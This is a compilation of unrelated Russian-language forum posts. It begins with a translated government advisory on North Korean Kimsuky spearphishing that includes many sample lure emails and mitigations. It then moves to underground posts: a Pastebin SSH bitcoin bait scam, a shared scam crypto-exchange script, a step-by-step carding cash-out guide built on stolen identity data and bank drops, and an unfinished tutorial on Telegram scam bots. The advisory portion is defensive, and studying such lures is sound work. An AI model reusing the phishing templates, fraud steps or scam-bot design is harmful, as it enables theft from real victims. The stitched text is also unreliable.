Основные темы, которых следует остерегаться, — злоумышленники выдают себя за другое лицо с последующими попытками коммуникаций с журналистами, учеными и исследователями аналитических центров, являющихся их целями. Например, хакеры:
Kimsuky адаптируют темы кампаний в зависимости от интересов жертвы и часьл обновляют контент своих рассылок для отражения текущих событий, которые на данный момент обсуждаются сообществом наблюдателей по Северной Корее.
Ниже приведены примеры реальных попыток целевого фишинга Kimsuky , которые иллюстрируют вариации тем кампаний. В некоторых случаях злоумышленник выдает себя за журналиста и проводит кампанию против аналитического центра и его исследователей, в то время как в других случаях хакер из КНДР может представляться ученым для последующих кампаний против других ученых.
1. Выдача себя за журналистов
Kimsuky часто выдают себя за реальных журналистов или редакторов телепередач для создания реальной легенды и дальнейшего контакта с видными специалистами по Северной Корее. Обычно вопросы касаются текущих событий и того, верят ли американские эксперты в то, что Северная Корея вновь присоединится к переговорам с США; верят ли они, что Северная Корея возобновит испытания своих ракет, и как, по их мнению, отреагирует на такие испытания Китай.
Во многих случаях участники Kimsuky не прикрепляют вредоносное ПО к своему первоначальному электронному письму. Вместо этого они отправляют вступительное электронное письмо, чтобы узнать о возможностях интервью.
Образец легенды №1
Title: < name of legitimate Korean journal program>
Greetings,
My name is < name of writer>, and I am a writer for < name of legitimate Korean journal
program>.
I am writing to you today because I am currently preparing for a program related to North
Korean issues. Professor < name of professor> of < actual Korean university>, whom I
contacted earlier, recommended you as an expert on this issue. I would be grateful if you
could spare some time to answer a few questions.
Thank you for considering my request. I look forward to hearing from you soon.
Best regards,Click to expand...
Последующее электронное письмо: если цели соглашаются на интервью, злоумышленники отправляют второе электронное письмо, содержащее вредоносный контент.
Title: RE: RE: < name of legitimate Korean journal program>
Dear < name of expert>,
As promised, I am sending you a questionnaire. It would be greatly appreciated if you could
answer each question in 4-5 sentences. Thank you for your cooperation.
Best regards,
@ attached file: [< name of legitimate Korean journal program>] questionnaire.docxClick to expand...
Кроме того, мы наблюдали, как члены Kimsuky подделывали личности реальных журналистов, специально нацеливая кампании на сотрудников аналитических центров. В своих фишинговых кампаниях Kimsuky обычно задают вопросы о текущих политических событиях, такие вопросы как - темы, связанные с вторжением России в Украину; отношения США и КНДР; вопросы ядерной безопасности и безопасности КНДР; позиция политиков в азиатском регионе; и мысли о текущих отношениях между Китаем и Северной Кореей и Россией и Северной Кореей.
Образец легенды №2
Greetings,
I hope you've been well! This is < name of real journalist> with < legitimate U.S. news
organization>.
North Korea Fires Powerful Missile on 4 Oct using Old Playbook in a New Worlds. The last
time Pyongyang launched a weapon over Japan was in 2017, when Donald J. Trump was
president and Kim Jong-un seemed intent on escalating conflict with Washington.
I have some questions regarding this:
- Would Pyongyang conduct its next nuclear test soon after China’s Communist Party
Congress in mid-October?- May a quieter approach to North Korean aggression be warranted?
- Would Japan increase the defense budget and a more proactive defense policy?
I would be very grateful if you could send me your answers within 5 days.
Have a good weekend.
Sincerely,
< name of legitimate journalist>Click to expand...
2. Выдача себя за известных ученых
Kimsuky выдают себя также за южнокорейских академиков для рассылки фишинговых кампаний исследователям из аналитических центров. В этих электронных письмах целевым объектам предлагается принять участие в опросе, например, по ядерным вопросам Северной Кореи и денуклеаризации на Корейском полуострове, или запросы на интервью.
Образец легенды №3
Title: < name of legitimate Korean think tank institute> Request for survey
Hello,
I am < name of an academic scholar> from < name of legitimate Korean think tank>.
I am reaching out to ask if you would be willing to participate in a survey on North Korea’s
nuclear development titled, “A survey on the perception on experts on the advancement of
North Korean nuclear weapons and the denuclearization of the Korean Peninsula”. Our goal
is to find ways to resolve North Korean nuclear issues and achieve denuclearization on the
Korean Peninsula. Rest assured that all answers will be kept confidential and used solely for
research purpose. As a token of appreciation, we would like to offer 300,000 won to those
who participate in the survey. If you’re interested in participating, please reply to this
message, and we will send you the survey questionnaire. Looking forward to hearing from
you soon.
Best regards,Click to expand...
Последующее электронное письмо: как только цели отвечают на запросы, актеры Kimsuky отправляют им анкету с опросником и бланк документа для оплаты, который содержит вредоносный контент.
Title: RE: RE: < name of legitimate Korean think tank institute> Request for survey
Thank you for your response.
We will send you a document form for payment, which includes a personal information
usage agreement. If possible, please fill out your affiliation, name, ID number, bank account,
and signature, and attach copies of your bankbook and ID card.
Best regards,
P.S. The attached document is password-protected, and I will send you the password in a
‘password.txt file’
@ attached file: PersonalInformationUsageAgreementClick to expand...
Образец легенды №4
Ниже приведен пример, когда Kimsuky пытались получить ответы на вопросы целей-экспертов в определенных отраслях, представляясь профессорами университета и студентами-исследователями. Как только они получали первоначальный ответ, следом запрашивали от участников собеседование по электронной почте со списком вопросов с ссылкой на документ через вредоносную ссылку на фальшивый сайт, имитирующий облачный сервис.
o: < name of foreign affairs expert>
Subject: Re: Request for an interview
Dear < name of foreign affairs expert>, Sorry for my late response because of the Profs
busy time and thanks so much for replying me your kind answers. I did confer with
**< legitimate U.S. University Professor >**about it and modified a bit. Please find the link below
and let me know if you have the different opinions.
https: < malicious drive link>
PWD: < redacted>
Best, < fictitious university student>Click to expand...
To: < foreign affairs expert>
Cc: < scholar>
Dear < foreign affairs expert>, Thanks so much for your fast feedback. I did confer with
< legitimate U.S. university professor> again and complete it as your request. Please find
the updated below. https: < malicious drive link>
PWD: < redacted>
We're planning to upload it on our website within a week after final review. Please feel free
to contact with me if you have any questions.
Best, <fictitious university student >Click to expand...
2. Выдача себя за исследователей аналитических центров.
Kimsuky часто выдают себя за реальных исследователей южнокорейских аналитических центров для того, чтобы рассылать в дальнейшем фишинговые письма политическим экспертам по Северной Корее. Чтобы наладить контакт, в первых письмах злоумышленники спрашивают у экспертов мнение по различным вопросам , например по "внешней политике Северной Кореи и нашему ответу на нее".
Образец легенды №5
Title: [Request for opinion] I’m < name of legitimate Korean think tank>
Greetings,
I am < name of legitimate Korean think tank>, deputy director of the < name of deputy
director>.
I am reaching out to you to discuss an article I am currently working on.
The topic, “North Korea’s foreign policy and South Korea’s response” is somewhat distant
from my expertise, so I would greatly appreciate hearing the opinions of experts like you.
I would kindly request your comments on my writing, as I believe you are the most
appropriate person to provide valuable insights on the subject. Your earlier article caught my
attention, and I found myself nodding in agreement with each sentence. That is why I feel
confident in asking for your opinion.
I am eagerly awaiting your reply and appreciate your willingness to assist me. Thank you for
your time and consideration.Click to expand...
Последующее электронное письмо: после получения ответов от целей, Kimsuky обмениваются с ними еще несколькими письмами, которые могут включать в себя вложения, содержащие вредоносные ссылки или файлы, и инструкции о том, как открыть вложенные файлы. Даже после успешного получения скомпроментированной информации с жертвы и заражения их устройств, злоумышленники часто продолжают отвечать своим жетвам и отправлять им письма с благодарностью (лол).
Title: RE: RE: [Request for opinion] I’m < name of legitimate Korean think tank> < name of
deputy director> < attached large size file>
Thank you for agreeing to provide your opinion. Please find the attached files.
We greatly appreciate your input. To ensure security in the face of increasing hacking
activity, we have set a password (< password string>) for the attached file.
We look forward to hearing your valuable feedback.Click to expand...
Образец легенды №6
Ниже приведен пример того, как актеры Kimsuky подделали личность сотрудника аналитического центра и использовали поддельный домен аналитического центра, чтобы нацелиться на другого сотрудника аналитического центра. Как только цель отвечает на первое письмо, злоумышленник Kimsuky отправляет дополнительное электронное письмо с вредоносным вложением.
Dear < think tank employee>,
Hope you are doing well. On behalf of < another think tank>, it is my pleasure to invite you
to write a 1,200-word piece on the recent NK's provocation.
North Korea’s latest missile launches, including the launch of an intermediate-range ballistic
missile (IRBM) over Japan on October 4 and two short-range ballistic missiles (SRBMs) on
October 6, provide a stark reminder of the numerous missile programs it is pursuing.
Subject is as follows:
- Would Pyongyang conduct its next nuclear test soon after China’s Communist Party
Congress in mid-October?- May a quieter approach to North Korean aggression be warranted?
- Would Japan increase the defense budget and a more proactive defense policy?
You can send me this email by Oct 21. You can make your own title for your article. We can
provide you with a small honorarium of around USD 480.00.
I would really appreciate it if you can contribute.
Best,
< Redacted>
Senior Fellow, < think tank>
Director, < think tank>Click to expand...
Последующее электронное письмо: злоумышленник Kimsuky отправляет дополнительное электронное письмо с вредоносным вложением.
Dear < think tank employee>,
Sorry for my late response.
As promised, I’m writing to send our result of the review. Please find the attached and let me
know if any problems.
PW: < redacted>
Best,
< Redacted>
Senior Fellow, < think tank>
Director, < think tank>Click to expand...
4. Выдача себя за представителей государственных и правоохранительных органов, веб-администраторов.
Ниже приведен пример того, как члены Kimsuky подходят к своим целям, выдавая себя за лиц, ответственных за политику Северной Кореи в таких государственных учреждениях, как Национальное собрание Южной Кореи или офис президента. Учетные записи этих персон часто уже были скомпрометированы ранее в результате предыдущей атаки. В следствие этого Kimsuky могут упомянуть конкретную информацию о должности или графике работы цели, которую они ранее получили из переписки цели или ее адресной книги.
Образец легенды №7
Title: Office of < member of the National Assembly>/Seminar “Proposal for the Unification
Policies of the Yoon Government”
Hello, this is < name of secretary> from the office of < member of the National Assembly>.
Let me express our gratitude for your attendance and participation at the seminar we hosted
yesterday. Your presence and insights contributed greatly to the success of the event.
If it’s not too much trouble, could you kindly provide us with a brief summary of the remarks
you made during the seminar? We would like to keep it as an internal reference material.
Additionally, we would greatly appreciate it if you could fill out the attached form and send it
back to us. This will serve as an evidence document for the speaking fee payment
procedure.
Password: < redacted>
Thank you again for your participation and we hope to see you at future events. Have a
great weekend.Click to expand...
Kimsuky также могут выдавать себя за следователей или сотрудников правоохранительных органов, чтобы ввести в заблуждение цель, заставив ее поверить в то, что их учетная запись электронной почты могла быть причастна к какому-либо инциденту. Злоумышленники подходят к своим целям, используя авторитет следственных органов, подразумевая легенду, что учетная запись цели могла быть украдена или что цель может быть замешана в преступлении или инциденте, связанном с национальной безопасностью.
Образец легенды №8
Title: < legitimate Investigator> of < legitimate investigation agency>.
I am < legitimate Investigator> of.
I’m writing to inform you that someone has published content on YouTube using your email
account that violates the National Security Law.
Link: https:// HYPERLINK "https://%3cyoutube/"< HYPERLINK
"https://%3cyoutube/"YouTube video link>. The video was posted on < Date: 0000. 0. 00.>
by < target>
We also suspect that the same user has posted content that slanders North Korean
defectors. We need your cooperation to identify the real publisher of these posts.
1. Provide us with your computer media access control address (MAC address) and
Ethernet hardware address, as they are needed to track any illegal access to your email
account.
2. If you cannot locate these addresses in your computer system, please run the program
below and send us the resulting document:
3) Please respond to this email within 24 hours and delete it immediately after sending your
reply.
Thanks you for your cooperationClick to expand...
Кроме того, Kimsuky выдают себя за администраторов популярных веб-порталов и утверждают, что учетная запись жертвы была заблокирована из-за подозрительной активности или мошеннической активности аккаунта. Жертвам рекомендуется защитить свою личную информацию и разблокировать свою учетную запись, щелкнув на ссылку, прикрепленную к электронному письму, и сменив пароль. Ссылка ведет на фишинговый сайт, который имитирует легитимную страницу входа в веб-портал, где жертвам предлагается ввести личную информацию, в том числе имена пользователей и пароли, для последующего их сбора киберпреступниками из КНДР.
Образец легенды №9
Title: Your Password for < legitimate portal site> Account Has Been Compromised
We regret to inform you that we have detected an attempt to log into your account (< email
address>) from an unauthorized application. The incident occurred onat Click to expand...
Меры по мягчению последствий кампаний
Для получателей электронной почты:
Внедрите базовую политики безопасности, включающие в себя надежные пароли, многофакторную аутентификацию и установку антивирусных средств. Ознакомьтесь с рекомендациями АНБ по обеспечению безопасности домашней сети или прочитайте Руководство NIS по безопасности электронной почты для конкретных рекомендаций.
Не включайте макросы для документов, полученных по электронной почте, если источник не проверен.
Не открывайте документы из служб облачного хостинга, полученные по электронной почте, если их источник не проверен.
Внимательно проверяйте личность своего респондента и связанные с ней страницы в социальных сетях или учетные данные на предмет подделки. Будьте особенно осторожны с:
- Официальными сообщениями, поступающими с неофициальных или личных учетных
записей электронной почты, использующих коммерческих провайдеров.
- Проверяйте подлинность вариантов домена/субдомена, так как часто
злоумышленники из КНДР регистрируют поддельные домены (например,
johndoe@abccompany.live вместо
johndoe@abccompany.com).
Если вы ранее общались с этим человеком, используйте его известную контактную информацию вместо новой потенциально опасной электронной почты или учетной записи.
Если вы сомневаетесь в контактной информации, зайдите на официальный сайт организации, чтобы ее проверить.
Если вы все еще не уверены, подтвердите личность по телефону или видеозвонку, прежде чем продолжать дальнейшее общение. Злоумышленники КНДР, как известно, не выходят за пределы виртуальной среды и будут избегать голосовой/видеосвязи.
Если вы не можете проверить личность, кто стоит за запросом по электронной почте, подумайте о рисках, а стоит ли вообще отвечать.
Рассмотрите возможность перехода на веб-сайты через результаты запроса поисковой системе вместо того, чтобы щелкать на URL-адреса, указанные в электронных письмах.
С осторожностью относитесь к просьбам о продолжении общения через отдельную платформу для обмена сообщениями.
При отправке документов отправляйте их только на подтвержденные адреса электронной почты.
Для системных администраторов доменов потенциальных целей злоумышленников
Внедрите программу обучения пользователей и упражнения по борьбе с фишингом, чтобы повысить осведомленность пользователей о рисках, связанных с посещением веб-сайтов, переходом по ссылкам и открытием вложений. Заставьте своих пользователей адекватно реагировать на целевые фишинговые электронные письма.
Требуйте многофакторную аутентификацию (MFA) для максимально возможного количества служб, особенно для веб-почты, виртуальных частных сетей (VPN), учетных записей, обеспечивающих доступ к критически важным системам, и привилегированных учетных записей, управляющих резервным копированием.
Регулярно проверяйте открытые порты на своих системах, чтобы определить, осуществляется ли удаленный доступ к вашей сети через программное обеспечение для совместного доступа к рабочему столу, VPN или VPS. Особенно если использование программного обеспечения для удаленного совместного использования рабочего стола или служб VPN для доступа к учетным записям не является стандартной практикой для вашей организации.
Если вы используете удаленные рабочие столы (RDP) или другие потенциально опасные удаленные службы, внимательно следите за ними и обеспечьте их безопасность:
- Ограничьте доступ к ресурсам внутренней сети, особенно за счет ограничения
RDP и использования инфраструктуры виртуальных рабочих столов. После оценки
рисков, если RDP считается необходимым инструментом для работы в организации,
ограничьте адреса для работы с RDP и требуйте MFA, устойчивый к фишингу, для
предотвращения кражи и повторного использования учетных данных. Если RDP
должен быть доступен извне сети, используйте VPN, инфраструктуру виртуальных
рабочих столов или другие средства для аутентификации и защиты соединения,
прежде чем разрешать RDP подключаться к любым внутренним устройствам сети.
Следите за журналами удаленного доступа/RDP, принудительно блокируйте учетную
запись после определенного количества попыток подбора пароля, региструйте
любые попытки входа в RDP и отключите неиспользуемые порты удаленного
доступа/RDP.
- Убедитесь, что ваши устройства правильно настроены и у них включены
средства безопасности. Отключите порты и протоколы, не используемые в
коммерческих целях (например, порт 3389 RDP Transmission Control Protocol).
- Ограничьте использование протокола SMB в сети для доступа только к
необходимым серверам и отключите устаревшие версии SMB (т. е. SMB версии 1).
Злоумышленники часто используют SMB для распространения вредоносного ПО в
организациях.
- Проверьте состояние безопасности систем любых ваших контрагентов и тех, кто
как-либо связан с вашей организацией. Убедитесь, что все соединения между
контрагентами и любым внешним программным или аппаратным обеспечением
отслеживаются и проверяются на наличие подозрительной активности.
- Внедрите политики безопасности приложений, которые разрешают выполнять
только известные и разрешенные программы в ваших системах.
Открывайте программы чтения документов в защищенных режимах просмотра, чтобы предотвратить запуск активного содержимого.
Регулярно устанавливайте обновления для операционных систем, программного обеспечения и приложений по мере их выпуска. Своевременное обновление программ является одним из наиболее эффективных и экономичных шагов, которые организация может предпринять, чтобы свести к минимуму возможность потенциальных угроз для своей безопасности. Регулярно проверяйте наличие обновлений для программного обеспечения и следите за любыми уведомлениями об окончании срока поддержки программ, уделяйте повышенное внимание исправлению известных эксплуатируемых уязвимостей. Рассмотрите возможность использования централизованной системы управления исправлениями для автоматизации и ускорения процесса обновлений.
Установите и регулярно обновляйте антивирусное программное обеспечение на всех ваших системах.
Рассмотрите возможность обязательного требования учетных данных администратора для установки программного обеспечения.
Добавляйте уведомление к любым сообщениям электронной почты, поступающим из-за пределов вашей организации, указывая на то, что они несут повышенные риски безопасности.
Рассмотрите возможность установки правил для блокировки сообщений электронной почты, которые соответствуют шаблоном фишинговых кампаний из нашего биллютеня. Также важно понимать, как сканировать вредоносные недоставленные сообщения электронной почты на ваших почтовых серверах, для того чтобы эффективно их блокировать после обнаружения вредоносных идентификаторов электронной почты.
Включение DMARC и DKIM на доменах электронной почты, как правило, усложняет подделку адреса отправителя электронной почты, но это не может нейтрализовать полностью описанные выше тактики.
Выплата вознаграждений за информацию об активных кампаниях КНДР
Правительства США и Южной Кореи призывают жертв сообщать в соответствующие органы о любой подозрительной деятельности, связанной с кампаниями злоумышленников КНДР. Если вы предоставите информацию о незаконной деятельности КНДР в киберпространстве, включая прошлые или текущие операции, вы имеете право получить вознаграждение в размере до 5 миллионов долларов США. Для получения дополнительной информации, посетите сайт: https://rewardsforjustice.net/
Отказ от ответственности
Информация в этом отчете предоставляется «как есть», только в информационных целях. Ответственные агентства не предоставляют какие-либо коммерческие продукты или услуги, включая любые исследования и анализ инцидентов. Любая ссылка на конкретные коммерческие продукты или услуги с зарегистрированным товарным знаком, названием производителя не подразумевает одобрение или рекомендацию авторами данного биллютеня.
ПРИЛОЖЕНИЕ: ДОПОЛНИТЕЛЬНЫЕ ПРИМЕРЫ ФИШИНГ КАМПАНИЙ КНДР
Образец легенды №10
“This is < name of legitimate journalist> from < legitimate non-U.S. news
organization>
I’m writing to know your thoughts on North Korea’s future direction after the Beijing
Winter Olympics are over. Many believe a recent absence of North Korean
provocations is due to Pyongyang’s decision not to hurt Olympic vibes held in its lone
major ally, but with the Games in the books, speculation is growing that North Korea
is likely to pick up where it left off in January, or a series of missile tests.
-Do you believe North Korea will resume testing its missile launches? If so, when is
the best time for it and what kind of missiles it will opt?
-China is scheduled to hold the National People’s Congress, and the Chinese
People’s Political Consultative Conference from March 4 to 13 and do you think the
schedule will further defer North Korea’s possible missile testing?
-North Korea has indicated that it will lift its moratorium on missile and nuclear tests,
but do you think there is the possibility that Pyongyang will offer to talk with the U.S.,
putting the moratorium on the line? If so, what would be the U.S. response? I’d be
very grateful if you could send me your answers within this weekClick to expand...
Образец легенды №11
Title: Documents for the Policy Advisory Committee.
Hello, < member of the committee>,
I am < name of government employee> from < government department>.
I am writing to inform you that I have attached the filed related to the recent visit of Special
Representative Biegun to this email.
As this email contains sensitive information, please treat it as confidential.
< file name.pdf>Click to expand...
Образец легенды №12
Dear < university professor>:
I hope you are safe and well.
This is < legitimate journalist> from < legitimate non-U.S. news organization>. I am
sending e-mail to you because I would like to hear your opinions about how Russia’s
invasion of Ukraine will affect the situation surrounding North Korea. Would you like to give
me your opinions about the questions below?
- Some analysts argue that Russia’s invasion of Ukraine may make North Korea much
more reluctant to give up nuclear weapons, given that Ukraine has been eventually invaded
by Russia after it abandoned its nuclear arsenal in exchange for security guarantees under
the Budapest Memorandum. This certainly looks similar to an agreement made between
Trump and Kim Jong Un in Singapore in 2018. What do you think about this kind of
argument?- While the Biden administration is concentrated on the evolving circumstances surrounding
Ukraine, possibly lowering its guard in the Asia-Pacific region, North Korea Launches New
ICBM and may try to carry out nuclear tests. What do you think about North Korea’s future
developments?- Do you think North Korea believes that Biden is already a “lame duck” and sees this as a
good chance to concentrate on developing new weapons?- Do you expect China will tolerate North Korea’s spate of ballistic missile launches and
possible nuclear tests? Do you think North Korea can or will maintain stable and amicable
relations with China? Does Russia not afford to care about North Korea?
I would be very grateful if you could send me your answers within 5 days. Thanks for your
consideration and time in advance.
best regards.
< legitimate journalist>Click to expand...
Образец легенды №13
Title: Your email account has been suspended
We are writing to inform you that your email account has been suspended because emails
you sent appear to have violated relevant laws and in some cases you may be held legally
liable. If you did not send any spam mails from your < portal site> mail account, it is possible
that your account may have been compromised and used by someone else for spamming.
We recommend checking your email settings to ensure that your POP/IMAP options have
not ‘Enabled’ others to use your account.
If you are still unable to identify any problems with your email settings, it is possible that your
account has been hacked and your personal information was stolen. To regain access to
your email account, please follow the steps provided by our investigation department by
clicking the button below.
< Button linking to phishing website disguised as a normal portal login page>Click to expand...
Образец легенды №14
Title: Notification regarding your fraudulent account registration
This is the < legitimate portal site> operation team, and we regret to inform you that your ID
< redacted> has been registered as a fraudulent account. To prevent any further harm, we
recommend that you take immediate action.
We kindly request you to verify your identity as soon as possible to ensure the safety and
security of your account. You can do this by visiting the member information page and
checking the registered name. We also advise you to change your password to keep your
account protected. Please be aware that the fraudulent account registration occurred on
00:00, 00/00/0000.
To unlock your account, please follow the link provided below:
< unlock your account: malicious link>
Thank you for choosing**** as your trusted platform. We are committed
to providing you with the best possible service and support.Click to expand...
Может не новый, но я вижу впервые. Слежу за pastebin и сегодня заметил такую
тему.
Делается запись в pastebin с текстом:
Code:Copy to clipboard
Dear User
We have received a request to reset the login information for your Bitcoin wallet. If you did not make this request, please disregard this message.
Your new login credentials will be
rhydyllaqx:cYbxTP on 16.170.239.178(SSH)
Regards
Подключаясь через SSH, получаем такую картину:
И такую:
Если попробовать вывести баланс, показывает, что кошелек для вывода не
подтвержден, для подтверждения нужно перевести 0.001 BTC на адрес депозита.
Пока никто не переводил, можно понаблюдать, сколько людей поведутся, вот
кошелек: bc1q5mdrw6zsnumwk7hsy4vyd2c528tugzdyq3u2sa
Не понятно, на кого рассчитано. Тот, кто умеет работать с SSH, вряд ли поведется. Если и найдется лох, то сумма может быть и 0.01 BTC. Тут либо полный лох, либо не переведет вообще никакую сумму.
Давно я ничего вам не сливал..
Смотрю, многие интересуются криптобиржей
"Слейте криптобиржу"
"Дайте селлера"
Если зайдет, то солью в ближайшие дни ещё несколько полезных штук
![disk.yandex.ru](/proxy.php?image=https%3A%2F%2Fyastatic.net%2Fs3%2Fpsf%2Fdisk- public%2F_%2F6jthIYkBdecaLwm8yXZPKuI1HW7.png&hash=b0d5b13490a25fa31bdcd9938218b7e3&return_error=1)
Посмотреть и скачать с Яндекс Диска
![disk.yandex.ru](/proxy.php?image=https%3A%2F%2Fyastatic.net%2Fs3%2Fpsf%2Fdisk- public%2F_%2F5hb_sU044zVfPgNsMKf8pNs2_6H.png&hash=7a8adcf3b9b4977c20c8df73c9c222b3&return_error=1) disk.yandex.ru
_Вт чекайте
Даю вам рабочую, но сырую биржу
Буду благодарен кодерам, если закините доработку_
Одни техники атак приходят на смену другим, но кое-что остается неизменным: пока компьютерами пользуются люди, социальная инженерия будет оставаться в арсенале киберзлодеев.
Чтобы успешно применять ее, не нужно даже быть технарем. В качестве наглядного курса для начинающих мы вспомнили восемь примеров социальной инженерии, которые можно встретить в популярных фильмах.
Spoiler: Читать
concernant tgraph Resources and Information. ](https://tgraph.io/Socialnaya- inzheneriya-v-kino-7-filmov-po-kotorym-mozhno-izuchat-socialnuyu- inzheneriyu-05-22)
Ce site web est à vendre ! tgraph.io réunit des informations et annonces. Nous espérons que vous y trouverez les informations que vous recherchez !
tgraph.io
Добрый день!
Подскажите, где можно найти скрипт скам биржи или контакты селлера?
Заранее благодарен
Cashout Prerequisites:
1. Debit Card (known balance) + Fullz you can buy from any of your favourite
cc Vendor or @Fraudcardy on telegram
2.Bank drop with Mobile Deposit (Money Lion for instance) – You get virtual
card
3. Truthfinder account (25$ per month or so)
4. Wallethub.com account (for the credit report) – Free
5. Good socks (lux, vip72, faceless) / VPN on mobile ( Whoer and Express VPN
recommended because it uses proxy connections therefore bypassing the open
port scannings)
6. Phone number (phoneblur.com)
7. Email (Gmail, Hotmail, Outlook etc)
8. Printer or printer service in your area
How to:
1. Create a Suntrust Bank Drop using the CC fullz
2. it goes without saying that you must prepare your system according with
your fullz. Same city socks, time zone, browser language etc. If you want a
bank drop for your dirty works Hmu
3. Deposit the funds via debit card (Nothing will flag because CC name
matches Bank Drop Name you just created)
4. After funds are deposited, go to http://www.onlinecheckwriter.com and
connect your newly created drop then create a check for your own Drop to
deposit the funds you just added to Suntrust ( will be delivered per email )
5. Print the check then Mobile Deposit them in your bank drop
6. Funds will be deposited from Suntrust to your Bank Drop in 2-3 days
7. Given your Bank Drop is yours, you can now cashout to BTC as per your
usual channel
8. Rinse & Repeat
Условия для вывода средств:
1. Дебетовая карта (известный баланс) + Fullz вы можете купить у любого из
ваших любимых продавцов cc или @Fraudcardy в телеграмме
2. Сброс банка с мобильным депозитом (например, Money Lion) — вы получаете
виртуальную карту
3. Аккаунт Truthfinder (25 долларов в месяц или около того)
4. Аккаунт Wallethub.com (для кредитного отчета) – Бесплатно
5. Хорошие носки (lux, vip72, безликие) / VPN на мобильных устройствах
(рекомендуется Whoer и Express VPN, поскольку они используют прокси-
соединения, поэтому обход открытых портов сканирования)
6. Номер телефона (phoneblur.com)
7. Электронная почта (Gmail, Hotmail, Outlook и т. д.)
8. Принтер или служба печати в вашем регионе
Как:
1. Создайте Suntrust Bank Drop, используя CC fullz
2. Само собой разумеется, что вы должны подготовить свою систему в
соответствии с вашим fullz. Носки того же города, часовой пояс, язык браузера
и т. д.
3. Внесите средства с помощью дебетовой карты (ничего не будет отмечено,
потому что имя CC совпадает с именем банка, которое вы только что создали)
4. После того, как средства будут зачислены, перейдите на
http://www.onlinecheckwriter.com и подключите недавно созданный дроп, затем
создайте чек для своего собственного дропа, чтобы внести средства, которые вы
только что добавили в Suntrust (будет доставлено по электронной почте)
5. Распечатайте чек, затем внесите его с мобильного телефона в свой банк.
6. Средства будут переведены из Suntrust на ваш банковский счет в течение 2-3
дней.
7. Учитывая, что ваш Bank Drop принадлежит вам, теперь вы можете обналичивать
BTC в соответствии с вашим обычным каналом.
8. Промыть и повторить
Нужно обучение по кардингу
Привет!
В серии тем под названием S.C.A.M. обсудим наиболее простые и доходные методы
серого/черного заработка.
Приятного чтения!
В начале сотворил Бог небо и землю и Павла.
Земля же была безвидна и пуста без хорошего мессенджера, и тьма над интернетом, и Дух Божий носился над сетью.
И сказал Павел: да будет Телеграм. И стал Телеграм.
И увидел Бог Телеграм, что он хорош, и отделил Бог Телеграм от тьмы.Click to expand...
Воистину, Телеграм — это средство связи, завоевавшее большую популярность среди людей этого мира.
Поэтому сегодня я расскажу вам, как умельцы из СНГ сделали из простейшего
мессенджера - площадку по заработку миллионов.
Как именно Телеграм боты связанны с криптовалютами, способами аккумуляции
трафика и поиска клиентов? Приведём несколько кусков кода одного из ботов в
пример.
Разберём путь который проходят финансы, прежде чем попасть в карманы рабочего
скам-класса и как всё это можно автоматизировать.
В мире Telegram было много лжепророков и мошеннических команд, которые обманули людей своей злобой и жадностью (я в числе создателей могу говорить об этом точно).
И твари божьи эти, создавали поддельные учетные записи, выдавая себя за законные организации или реальных людей, чтобы завоевать доверие ничего не подозревающих пользователей. Как только они завоевали доверие своих жертв, они обманывали их обещаниями богатства от лукавого, убеждая их внести деньги или крипту в нужные им места. Эти нечестивцы использовали силу своего языка, чтобы обманывать, вводя многих в заблуждение и причиняя много страданий.
И прозвали эти богоотступники силу эту - Социальная Инженерия.
И команды эти, создавали поддельные группы, каналы или ботов, и использовали их для сбора трафика в одном месте.
И случилось так, что в Telegram возникло великое искушение, потому что были фальшивые боты, претендующие на принадлежность к бирже, известной как Binance, однако они были всего лишь ловушкой для неосторожных.Click to expand...
Они приспособились к новым мерам безопасности и неустанно работали над поиском новых способов скама.
Лжепророки были неутомимы в погоне за наживой, полученной нечестным путем, и никогда не останавливались в своих попытках ограбить невинных.Столкнувшись с этим злом, многие пользователи Telegram были разочарованы и обескуражены.
Задались они вопросом: есть ли надежда на платформу? И будет ли она когда- нибудь свободна от бича скам команд?Тем не менее, были и те, кто твердо стоял в своей вере, кто продолжал использовать Telegram во благо и не поддавался лжи.
Click to expand...
Поговорим же подробнее про зарождение.
То был далёкий 2018(19) год от рождения христа.
Создавали люди ботов бирж, как вы помните я писал выше.
Боты эти были созданы по принципу одиночного взаимодействия, сам создатель
пытался завлечь трафик в своего бота, при этом работая с каждым потенциальным
клиентом индивидуально, от чего часто встречался с проблемами упускания
клиентов.
Огромных высот данные авантюры не взыскали, однако пару миллионов кто-то всё
же вытащил.
Так продолжалось вплоть до 2019-20 года, когда один безымянный умелец, который поменял много никнеймов, начал выкатывать всех ботов в которых смог собрать все 4 стороны работы:
1 - Администрация
2 - Те кто работает
3 - Те над которыми работают
4 - Те кто добивает, устраивая полную казнь.
Причём вся система была автоматизирована, полностью:
Первые следят за работоспособностью систем бота.
Вторые (воркеры) полностью контролируют происходящее с третьими. Контроль происходит благодаря панели управления, приходит все отчёты о действиях третьих. А так же благодаря прямой связи 2 и 3. Для определения того кто привёл клиента использовалась реферальная система.
Третьи в данном случае, не контролируют ничего, и являются жертвами настолько, насколько возможно. Единственный шанс для них спастись - это промашка вторых.
Четвертые (саппорты, тех.поддержка) целый день наблюдают за происходящим с высока, и только и ждут когда жертва ничего не подозревающая но уже потенциально потерявшая свои средства, ради возвращения этих средств пойдёт на многое.
Разделю сразу ботов на:
NFT - новейшая тема на данный момент среди ботов.
Трейдинг - крипто и акционный,
Казино - крипто и обычное.
Я расскажу вам образ работы всех 3х видов ботов. (Код покажу только от NFT, потому что слишком лень переписывать под эту статью код всех трёх ботов)
Образ работы ботов. Обязательные пункты.
1. Bot Description:
'name' - это безопасный и надежный путь обмена вашими валютными парами.
'name' была основана в 2015 году двумя энтузиастами под впечатлением от
величия Bitcoin'a! На данный момент сервис содержит более 190 обменных пар и
более 50 возможных криптоактивов. (можете засовывать данные описания в миксер
слов и на выходе в любом случае получится что-то вменяемое)
2. Выбор языка основанный на языке пользователя, чем больше выбор - тем
лучше. Так же валидным решением будет дать выбор пользователю как было сделано
например у бота BitZlato. Там было на выбор очень много языков и это позволяло
повысить доверие к сервису с самого его начала.
После выбора языка так же предоставляется выбор валюты пользователя, в
основном это СНГ валюты + USD + EUR.
3. Приветственное сообщение - пишем политику и условия пользования данным
ботом.
Пишем максимально формальным языком.
Могу привести пример:
Перед принятием инвестиционного решения обязательно, чтобы инвестор провел
независимую оценку экономических рисков и выгод, налоговых, правовых и
бухгалтерских последствий, связанных с заключением сделки, а также свою
готовность и возможность принять на себя такие риски. Инвестор также несет
расходы, связанные с брокерскими и депозитарными услугами.
Принимая данные правила, вы подтверждаете свое согласие со всеми
вышеперечисленными положениями.
Обратите внимание, что если наша система обнаружит какие-либо подозрения в
мошенничестве или обмане, ваша учетная запись может быть заблокирована. Чтобы
